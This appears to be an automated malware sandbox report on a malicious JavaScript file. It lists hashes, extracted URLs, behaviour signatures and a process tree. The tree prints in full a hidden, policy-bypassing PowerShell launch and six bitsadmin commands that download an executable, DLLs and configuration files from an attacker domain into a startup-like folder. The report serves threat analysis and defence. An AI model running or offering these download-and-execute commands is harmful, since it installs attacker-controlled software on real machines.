Analysis
max time kernel: 75s
max time network: 79s
platform: windows7_x64
resource: win7-20230703-en
resource tags: arch:x64, arch:x86, image:win7-20230703-en, locale:en-us, os:windows7-x64, system
submitted: 09/07/2023, 19:19
Static task: static1
Behavioral task: behavioral1
  Sample: ave6119jsjsjsjsjsjsjsjsjs.js
  Resource: win7-20230703-en
Behavioral task: behavioral2
  Sample: ave6119jsjsjsjsjsjsjsjsjs.js
  Resource: win10v2004-20230703-en
General
Target: ave6119jsjsjsjsjsjsjsjsjs.js
Size: 48KB
MD5: 55843871939bed9cad5acd5fba556736
SHA1: 178c0a04d0ff6c2bb2baa1e5e241f3028198b935
SHA256: c4a3d1cec5bac2e0f1eb4671633ee0650b07831004130bd1d76c503655d2d26f
SHA512: a172c45060209c9ee5afd1348ed346a3c1de41f4b75b7ae4f58c9f0ae0f1782dbc0d5bf4e45c977b74bdecdf11f569203861ccba4526bb2a21c18734c673a6e3
SSDEEP: 1536:nb1OUBLsGy18tV+FKnU7rkGsBWOnK5/YP2ay++o:nb1lwaH+FKZGsBNnK5/YPeVo
Malware Config
Extracted
https://virvatulishop.com/labda.zip
https://virvatulishop.com/files/
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Download via BitsAdmin (1 TTPs, 6 IoCs)
  pid   Process
  2380  bitsadmin.exe
  2032  bitsadmin.exe
  1760  bitsadmin.exe
  2512  bitsadmin.exe
  2216  bitsadmin.exe
  1752  bitsadmin.exe
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2336  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2336  powershell.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  description                        pid   Process         procid_target
  PID 784 wrote to memory of 2336    784   wscript.exe     28
  PID 784 wrote to memory of 2336    784   wscript.exe     28
  PID 784 wrote to memory of 2336    784   wscript.exe     28
  PID 2336 wrote to memory of 2380   2336  powershell.exe  30
  PID 2336 wrote to memory of 2380   2336  powershell.exe  30
  PID 2336 wrote to memory of 2380   2336  powershell.exe  30
  PID 2336 wrote to memory of 2032   2336  powershell.exe  31
  PID 2336 wrote to memory of 2032   2336  powershell.exe  31
  PID 2336 wrote to memory of 2032   2336  powershell.exe  31
  PID 2336 wrote to memory of 1760   2336  powershell.exe  32
  PID 2336 wrote to memory of 1760   2336  powershell.exe  32
  PID 2336 wrote to memory of 1760   2336  powershell.exe  32
  PID 2336 wrote to memory of 2512   2336  powershell.exe  33
  PID 2336 wrote to memory of 2512   2336  powershell.exe  33
  PID 2336 wrote to memory of 2512   2336  powershell.exe  33
  PID 2336 wrote to memory of 2216   2336  powershell.exe  34
  PID 2336 wrote to memory of 2216   2336  powershell.exe  34
  PID 2336 wrote to memory of 2216   2336  powershell.exe  34
  PID 2336 wrote to memory of 1752   2336  powershell.exe  35
  PID 2336 wrote to memory of 1752   2336  powershell.exe  35
  PID 2336 wrote to memory of 1752   2336  powershell.exe  35
Processes
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js
  PID: 784
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\cv3ibkm.ps1
    PID: 2336
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
      PID: 2380
      - Download via BitsAdmin
    - C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe
      PID: 2032
      - Download via BitsAdmin
    - C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini
      PID: 1760
      - Download via BitsAdmin
    - C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL
      PID: 2512
      - Download via BitsAdmin
    - C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll
      PID: 2216
      - Download via BitsAdmin
    - C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf
      PID: 1752
      - Download via BitsAdmin
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 1KB
  MD5: 7269a83e127ff320b1f8810b6623ee98
  SHA1: 52d53be0e3bf58d1a330f24f7a4f1f6ee543b4a2
  SHA256: 9bb8941997354717115d7d57f559b16a5d4be037843cd2403ce16e61add7d404
  SHA512: 3bb453737c33a01ea10d365b93685a0d53d7a396d0d1a46466a08388acc49e662fd25300e36695466690cbf9198df9bb50dc1dd0ac6bf92aa7e37ca5152e9877